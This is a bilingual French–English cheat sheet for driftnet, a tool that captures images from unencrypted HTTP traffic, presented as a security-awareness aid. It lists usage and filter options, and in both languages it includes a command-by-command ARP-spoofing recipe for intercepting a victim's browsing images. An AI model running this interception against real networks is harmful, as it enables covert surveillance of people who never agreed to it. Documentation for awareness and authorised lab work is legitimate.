driftnet
Renifleur d'images en temps réel depuis le trafic réseau. Capture et affiche les images issues du trafic HTTP non chiffré sur le réseau : extrait les JPEG, GIF, PNG et autres images à mesure qu'ils transitent. Real-time image sniffer from network traffic. Captures and displays images from unencrypted HTTP traffic on the network — extracts JPEG, GIF, PNG and other images as they pass through.
↗ https://github.com/i-rinat/driftnetOverview
driftnet listens to network traffic and extracts images from TCP streams in real-time. It displays captured images in a window as they appear in unencrypted HTTP traffic — primarily a demonstration tool for network security awareness training showing why HTTPS matters.
Basic Usage
Capture images from live network traffic
sudo driftnet -i eth0
Read from pcap file
driftnet -f capture.pcap
Headless mode (save images, no display)
sudo driftnet -i eth0 -a -d /tmp/captured_images/
Verbose with all image types
sudo driftnet -i eth0 -v
Capture Options
Specify interface
sudo driftnet -i wlan0
Filter by BPF expression
sudo driftnet -i eth0 -p 'port 80'
Headless (no GUI window)
sudo driftnet -a -i eth0 -d /tmp/images/
Save images to directory
sudo driftnet -a -d /tmp/images/ -i eth0
Also capture audio (MPEG streams)
sudo driftnet -i eth0 -s
Reading from pcap
Process existing capture
driftnet -f capture.pcap -a -d /tmp/images/
With verbose output
driftnet -f capture.pcap -v -a -d /tmp/images/
Combining with ARP Spoofing
Step 1: Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# Step 2: ARP spoof between victim and gateway
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &
Step 3: Capture victim’s browsing images
sudo driftnet -i eth0
# Images from victim's HTTP traffic appear in real-time
Tips
- Only works on unencrypted HTTP — modern HTTPS sites show nothing
- Demonstrates clearly why HTTPS is essential — valuable for security awareness training
- Use on your own network or in authorized lab environments only
- Headless mode (
-a -d /path/) is better for captured traffic analysis - Most modern web traffic is HTTPS — effectiveness has declined significantly
Help / Man page
driftnet [options]
-i IFACE Network interface
-f FILE Read from pcap file
-a Headless (no display window)
-d DIR Save images to directory
-v Verbose
-p FILTER BPF packet filter
-s Also capture audio streams
-j JPEG images only
-g GIF images only
-n Don't display non-image connections
Vue d’ensemble
driftnet écoute le trafic réseau et extrait les images des flux TCP en temps réel. Il affiche les images capturées dans une fenêtre à mesure qu’elles apparaissent dans le trafic HTTP non chiffré : principalement un outil de démonstration pour la sensibilisation à la sécurité réseau, montrant pourquoi HTTPS est important.
Utilisation de base
# Capturer des images depuis le trafic réseau en direct
sudo driftnet -i eth0
# Lire depuis un fichier pcap
driftnet -f capture.pcap
# Mode headless (sauvegarder les images, sans affichage)
sudo driftnet -i eth0 -a -d /tmp/captured_images/
# Verbeux avec tous les types d'images
sudo driftnet -i eth0 -v
Options de capture
# Spécifier l'interface
sudo driftnet -i wlan0
# Filtrer par expression BPF
sudo driftnet -i eth0 -p 'port 80'
# Headless (pas de fenêtre GUI)
sudo driftnet -a -i eth0 -d /tmp/images/
# Sauvegarder les images dans un répertoire
sudo driftnet -a -d /tmp/images/ -i eth0
# Capturer aussi l'audio (flux MPEG)
sudo driftnet -i eth0 -s
Lecture depuis un pcap
# Traiter une capture existante
driftnet -f capture.pcap -a -d /tmp/images/
# Avec sortie verbeuse
driftnet -f capture.pcap -v -a -d /tmp/images/
Combinaison avec l’ARP spoofing
Étape 1 : Activer le forwarding IP
echo 1 > /proc/sys/net/ipv4/ip_forward
# Étape 2 : ARP spoof entre la victime et la passerelle
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &
Étape 3 : Capturer les images de navigation de la victime
sudo driftnet -i eth0
# Les images issues du trafic HTTP de la victime apparaissent en temps réel
Conseils
- Ne fonctionne que sur du HTTP non chiffré : les sites HTTPS modernes n’affichent rien
- Démontre clairement pourquoi HTTPS est essentiel : précieux pour la sensibilisation à la sécurité
- À utiliser uniquement sur votre propre réseau ou dans des environnements de lab autorisés
- Le mode headless (
-a -d /path/) est préférable pour l’analyse de trafic capturé - La majorité du trafic web moderne est en HTTPS : l’efficacité a considérablement décliné
Aide / Page de manuel
driftnet [options]
-i IFACE Network interface
-f FILE Read from pcap file
-a Headless (no display window)
-d DIR Save images to directory
-v Verbose
-p FILTER BPF packet filter
-s Also capture audio streams
-j JPEG images only
-g GIF images only
-n Don't display non-image connections